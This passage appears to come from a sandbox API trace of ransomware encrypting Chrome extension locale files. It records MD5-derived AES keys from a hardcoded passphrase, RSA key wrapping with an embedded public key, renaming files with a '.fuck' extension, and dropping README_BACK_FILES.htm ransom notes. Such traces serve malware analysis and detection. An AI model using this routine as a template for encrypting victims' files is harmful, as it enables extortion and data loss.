lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json"), bFailIfExists=0) returned 1 [0260.100] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json", dwFileAttributes=0x0) returned 1 [0260.100] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.gsg")) returned 1 [0260.101] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.fuck")) returned 1 [0260.103] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.103] CryptDestroyKey (hKey=0x2e7ce40) returned 1 [0260.103] CryptReleaseContext (hProv=0x2e6ee40, dwFlags=0x0) returned 1 [0260.103] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.103] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.103] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\readme_back_files.htm")) returned 0xffffffff [0260.103] AreFileApisANSI () returned 1 [0260.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.103] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.104] GetFileType (hFile=0x5d60) returned 0x1 [0260.104] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.107] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.107] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.108] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.108] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.108] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.108] GetLastError () returned 0x0 [0260.109] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json")) returned 0x20 [0260.109] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json", dwFileAttributes=0x80) returned 1 [0260.110] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.111] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.112] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.112] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6ee40) returned 1 [0260.115] CryptCreateHash (in: hProv=0x2e6ee40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.115] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.115] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.115] CryptDeriveKey (in: hProv=0x2e6ee40, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7cf00) returned 1 [0260.115] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.115] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.115] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6e978) returned 1 [0260.115] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6e978, dwCertEncodingType=0x1, pInfo=0x2eb22f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb2320*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb2328*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7cd40) returned 1 [0260.115] CryptEncrypt (in: hKey=0x2e7cd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.116] CryptEncrypt (in: hKey=0x2e7cd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6f280*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6f280*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.116] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6f280*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6f280*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.116] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xfe, lpOverlapped=0x0) returned 1 [0260.118] CryptEncrypt (in: hKey=0x2e7cf00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xfe, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0260.118] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0260.118] CloseHandle (hObject=0x5d64) returned 1 [0260.118] CloseHandle (hObject=0x5d5c) returned 1 [0260.118] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json"), bFailIfExists=0) returned 1 [0260.125] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json", dwFileAttributes=0x0) returned 1 [0260.126] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.gsg")) returned 1 [0260.127] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.fuck")) returned 1 [0260.128] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.128] CryptDestroyKey (hKey=0x2e7cf00) returned 1 [0260.128] CryptReleaseContext (hProv=0x2e6ee40, dwFlags=0x0) returned 1 [0260.128] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.128] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.128] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\readme_back_files.htm")) returned 0xffffffff [0260.128] AreFileApisANSI () returned 1 [0260.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.128] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.129] GetFileType (hFile=0x5d60) returned 0x1 [0260.129] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.130] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.130] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.131] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.131] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.131] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.131] GetLastError () returned 0x0 [0260.131] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json")) returned 0x20 [0260.132] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json", dwFileAttributes=0x80) returned 1 [0260.132] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.133] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.133] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.134] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.136] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.136] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.136] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.136] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ce40) returned 1 [0260.136] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.136] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.136] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6ee40) returned 1 [0260.137] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6ee40, dwCertEncodingType=0x1, pInfo=0x2eb1ad0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb1b00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb1b08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7cec0) returned 1 [0260.137] CryptEncrypt (in: hKey=0x2e7cec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.137] CryptEncrypt (in: hKey=0x2e7cec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6e3a0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6e3a0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.137] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e6e3a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6e3a0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.138] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xf9, lpOverlapped=0x0) returned 1 [0260.139] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xf9, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0260.139] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0260.140] CloseHandle (hObject=0x5d5c) returned 1 [0260.140] CloseHandle (hObject=0x5d64) returned 1 [0260.140] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json"), bFailIfExists=0) returned 1 [0260.143] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json", dwFileAttributes=0x0) returned 1 [0260.144] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.gsg")) returned 1 [0260.145] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.fuck")) returned 1 [0260.146] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.146] CryptDestroyKey (hKey=0x2e7ce40) returned 1 [0260.146] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.146] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.146] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.147] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\readme_back_files.htm")) returned 0xffffffff [0260.147] AreFileApisANSI () returned 1 [0260.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.147] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.147] GetFileType (hFile=0x5d60) returned 0x1 [0260.148] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) 